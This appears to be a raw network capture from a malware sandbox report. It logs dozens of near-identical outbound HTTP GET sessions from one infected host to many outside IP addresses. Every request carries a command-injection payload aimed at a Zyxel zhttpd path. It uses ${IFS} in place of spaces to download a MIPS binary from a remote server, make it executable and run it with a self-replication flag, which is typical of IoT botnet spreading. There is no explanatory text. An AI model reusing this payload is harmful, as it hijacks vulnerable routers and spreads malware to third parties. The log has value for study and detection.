                                                Jan 12, 2024 18:24:49.175421953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7813192.168.2.134146618.73.78.117443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.175451994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7814192.168.2.1352280206.146.228.13443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.175486088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7815192.168.2.135564064.145.198.18443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.175524950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7816192.168.2.135269282.90.67.88443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.175545931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7817192.168.2.134367675.226.181.231443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.175590038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7818192.168.2.1357800155.102.85.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.175645113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7819192.168.2.1341664182.232.223.33443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.175679922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7820192.168.2.13368525.157.100.205443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.175697088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7821192.168.2.1354996176.53.66.201443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.175755978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7822192.168.2.1340302112.227.226.33443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.175795078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7823192.168.2.134825889.105.180.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.175820112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7824192.168.2.133360693.235.218.44443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.175883055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7825192.168.2.133440240.194.174.198443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.175913095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7826192.168.2.13352128.198.246.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.175946951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7827192.168.2.1342266191.155.222.86443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.175992012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7828192.168.2.1350444137.23.123.28443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.176014900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7829192.168.2.134535660.96.1.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.176064014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7830192.168.2.1334570160.39.134.96443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.176111937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7831192.168.2.133945886.234.64.167443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.176137924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7832192.168.2.134306470.192.11.162443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.176172018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7833192.168.2.135577693.171.131.201443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.176202059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7834192.168.2.1346666141.103.58.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.176259995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7835192.168.2.13448849.65.29.26443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.176294088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7836192.168.2.1357108144.119.23.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.176337004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7837192.168.2.133918813.176.109.202443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.176386118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7838192.168.2.1352296158.39.2.153443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.176424026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7839192.168.2.1336490169.132.229.65443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.176455975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7840192.168.2.135909040.211.53.64443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.176502943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7841192.168.2.1334116106.235.193.182443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.176532984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7842192.168.2.1335204134.204.0.173443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.176565886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7843192.168.2.133562074.215.83.227443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.176613092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7844192.168.2.135914236.187.129.138443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.176652908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7845192.168.2.133923834.253.202.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.176700115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7846192.168.2.135237078.193.15.157443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.176739931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7847192.168.2.133977418.162.16.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.176769018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7848192.168.2.135147227.46.58.41443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.176825047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7849192.168.2.1351002142.253.181.247443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.176870108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7850192.168.2.1360280122.254.232.33443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.176906109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7851192.168.2.1336476116.86.125.94443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.176955938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7852192.168.2.134519686.76.156.51443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.176981926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7853192.168.2.1336380171.213.225.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.177022934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7854192.168.2.1356656223.160.80.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.177082062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7855192.168.2.134016814.175.129.135443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.177120924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7856192.168.2.1359222198.188.100.107443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.177162886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7857192.168.2.1344154170.224.67.70443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.177207947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7858192.168.2.1346170138.136.10.95443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.177241087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7859192.168.2.1357348158.171.234.146443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.177283049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7860192.168.2.135893620.224.69.151443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.177325010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7861192.168.2.1343896115.237.74.92443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.177360058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7862192.168.2.135923414.181.43.38443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.177397966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7863192.168.2.1338536169.161.197.127443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.177445889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7864192.168.2.1352166139.129.168.23443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.177491903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7865192.168.2.1348696163.166.158.62443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.177532911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7866192.168.2.1348710154.9.31.82443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.177577019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7867192.168.2.1341412101.213.37.167443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.177592039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7868192.168.2.13477809.227.176.199443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.177654028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7869192.168.2.133569454.26.29.5443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.177690029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7870192.168.2.133412099.135.2.115443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.177711010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7871192.168.2.1339952176.160.229.251443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.177767992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7872192.168.2.1349528208.41.106.111443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.177803993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7873192.168.2.1348692220.57.13.253443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.177860975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7874192.168.2.1352656211.50.92.160443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.177905083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7875192.168.2.1337160160.214.177.231443
                                                TimestampBytes transferredDirectionData
